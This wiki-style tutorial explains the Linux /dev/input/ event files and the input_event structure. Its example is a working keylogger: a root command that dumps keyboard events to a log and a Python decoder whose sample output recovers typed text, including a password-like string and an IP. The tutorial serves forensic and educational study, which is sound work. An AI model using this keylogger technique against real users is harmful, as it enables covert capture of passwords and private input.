Dev-input

From aldeid
Jump to navigation Jump to search

What is inside /dev/input/

If you ever wondered what is inside /dev/input/ of your Linux box, you're likely to learn something here.

$ ls /dev/input/
by-id    event1   event12  event15  event18  event20  event23  event3  event6  event9  mouse1
by-path  event10  event13  event16  event19  event21  event24  event4  event7  mice    mouse2
event0   event11  event14  event17  event2   event22  event25  event5  event8  mouse0

You'll notice that this can be broken down into:

  • by-id, by-path: hardware / input file input
  • event(n): keyboard and USB events
  • mice, mouse(n): mouse events

How to know what file to read?

To know what file inside the /dev/input/ directory to read, you can refer to /proc/bus/input/devices:

$ cat /proc/bus/input/devices 
I: Bus=0019 Vendor=0000 Product=0005 Version=0000
N: Name="Lid Switch"
P: Phys=PNP0C0D/button/input0
S: Sysfs=/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0D:00/input/input0
U: Uniq=
H: Handlers=event0 
B: PROP=0
B: EV=21
B: SW=1

I: Bus=0019 Vendor=0000 Product=0003 Version=0000
N: Name="Sleep Button"
P: Phys=PNP0C0E/button/input0
S: Sysfs=/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0E:00/input/input1
U: Uniq=
H: Handlers=kbd event1 
B: PROP=0
B: EV=3
B: KEY=4000 0 0

I: Bus=0019 Vendor=0000 Product=0001 Version=0000
N: Name="Power Button"
P: Phys=LNXPWRBN/button/input0
S: Sysfs=/devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
U: Uniq=
H: Handlers=kbd event2 
B: PROP=0
B: EV=3
B: KEY=10000000000000 0

[SNIP]

Example: keylogger

Logging

Let's take a concrete example. One could easily develop a keylogger as follows:

$ sudo cat /dev/input/event0 > /tmp/keylogger.log

Decrypting the log file

Here is what our log file looks like:

$ xxd keylogger.log | head
00000000: a1ee 705e 0000 0000 0c2a 0c00 0000 0000  ..p^.....*......
00000010: 0400 0400 1c00 0000 a1ee 705e 0000 0000  ..........p^....
00000020: 0c2a 0c00 0000 0000 0100 1c00 0000 0000  .*..............
00000030: a1ee 705e 0000 0000 0c2a 0c00 0000 0000  ..p^.....*......
00000040: 0000 0000 0000 0000 a3ee 705e 0000 0000  ..........p^....
00000050: 5b02 0700 0000 0000 0400 0400 3800 0000  [...........8...
00000060: a3ee 705e 0000 0000 5b02 0700 0000 0000  ..p^....[.......
00000070: 0100 3800 0100 0000 a3ee 705e 0000 0000  ..8.......p^....
00000080: 5b02 0700 0000 0000 0000 0000 0000 0000  [...............
00000090: a3ee 705e 0000 0000 773e 0800 0000 0000  ..p^....w>......

The format for the input stream is as follows:

struct input_event {
	struct timeval time;
	unsigned short type;
	unsigned short code;
	unsigned int value;
};

Using this structure, we can write the following python script:

#!/usr/bin/python3
import struct

# Mapping FR
mapping = {16:'a', 17:'z', 18:'e', 19:'r', 20:'t', 21:'y', 22:'u', 23:'i', 24:'o', 25:'p', 30:'q', 31:'s', 32:'d',
        33:'f', 34:'g', 35:'h', 36:'j', 37:'k', 38:'l', 39:'m', 44:'w', 45:'x', 46:'c', 47:'v', 48:'b', 49:'n',
        2:'&', 3:'é', 4:'"', 5:'\'', 6:'(', 7:'-', 8:'è', 9:'_', 10:'ç', 11:'à', 12:')', 13:'=', 27:'$', 40:'ù',
        43:'*', 50:',', 51:';', 52:':', 53:'!', 35:'h', 28:'\n', 42:'<SHIFT>', 54:'<SHIFT>', 29:'<CTRL>',
        56:'<ALT>', 100:'<AltGr>', 97:'<CTRL>', 82:'0', 79:'1', 80:'2', 81:'3', 75:'4', 76:'5', 77:'6', 71:'7',
        72:'8', 73:'9', 57:' ', 86:'<', 14:'<BACKSPACE>', 15:'    ', 59:'<F1>', 60:'<F2>', 61:'<F3>', 62:'<F4>',
        63:'<F5>', 64:'<F6>', 65:'<F7>', 66:'<F8>', 67:'<F9>', 74:'-', 83:'.', 96:'\n<ENTER>', 26:'^', 1:'<ESC>',
        78:'+', 103:'<UP>'}

FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)

print("============== RAW ===============")
output = []
with open("keylogger.log", "rb") as f:
    event = f.read(EVENT_SIZE)
    while event:
        (tv_sec, tv_usec, type, code, value) = struct.unpack(FORMAT, event)
        k = ""
        if type == 1 and value != 0:
            output.append(mapping[code])
            k = mapping[code]
        print ("%s\t%s\t%s\t%s\t%s\t%s" % (tv_sec, tv_usec, type, code, value, k))

        event = f.read(EVENT_SIZE)

print("=============== DECODED ==============")
out = ''.join(output)
print(out)

Here is the output:

$ ./keys.py 
============== RAW ===============
1584459425	797196	4	4	28	
1584459425	797196	1	28	0	
1584459425	797196	0	0	0	
1584459427	459355	4	4	56	
1584459427	459355	1	56	1	<ALT>
1584459427	459355	0	0	0	
1584459427	540279	4	4	15	
1584459427	540279	1	15	1	    
1584459427	540279	0	0	0	
1584459427	627625	4	4	15	
1584459427	627625	1	15	0	
1584459427	627625	0	0	0	
1584459428	688924	4	4	15	
1584459428	688924	1	15	1	    
1584459428	688924	0	0	0	
1584459428	767359	4	4	15	
1584459428	767359	1	15	0	
1584459428	767359	0	0	0	
1584459429	549153	4	4	56	
1584459429	549153	1	56	0	
1584459429	549153	0	0	0	
1584459431	507948	4	4	35	
1584459431	507948	1	35	1	h
1584459431	507948	0	0	0	
1584459431	577458	4	4	35	
1584459431	577458	1	35	0	
1584459431	577458	0	0	0	
1584459431	941140	4	4	20	
1584459431	941140	1	20	1	t
1584459431	941140	0	0	0	
1584459432	10718	4	4	20	
1584459432	10718	1	20	0	
1584459432	10718	0	0	0	
1584459432	428576	4	4	20	
1584459432	428576	1	20	1	t
1584459432	428576	0	0	0	
1584459432	507020	4	4	20	
1584459432	507020	1	20	0	
1584459432	507020	0	0	0	
1584459432	935793	4	4	25	
1584459432	935793	1	25	1	p
1584459432	935793	0	0	0	
1584459433	14337	4	4	25	
1584459433	14337	1	25	0	
1584459433	14337	0	0	0	
1584459433	377982	4	4	52	
1584459433	377982	1	52	1	:
1584459433	377982	0	0	0	
[SNIP]
1584459456	588435	1	29	1	<CTRL>
1584459456	588435	0	0	0	
1584459456	722988	4	4	46	
1584459456	722988	1	46	1	c
1584459456	722988	0	0	0	
=============== DECODED ==============
<ALT>        http:<SHIFT><SHIFT>::192.168.122.126
kali
azert<AltGr>"123!
<ALT>    <CTRL>c

Of course, it will require an extra effort to convert all the special characters, but you have the general understanding.

Comments

blog comments powered by Disqus

Keywords: forensics drivers linux dev input event evdev keylogger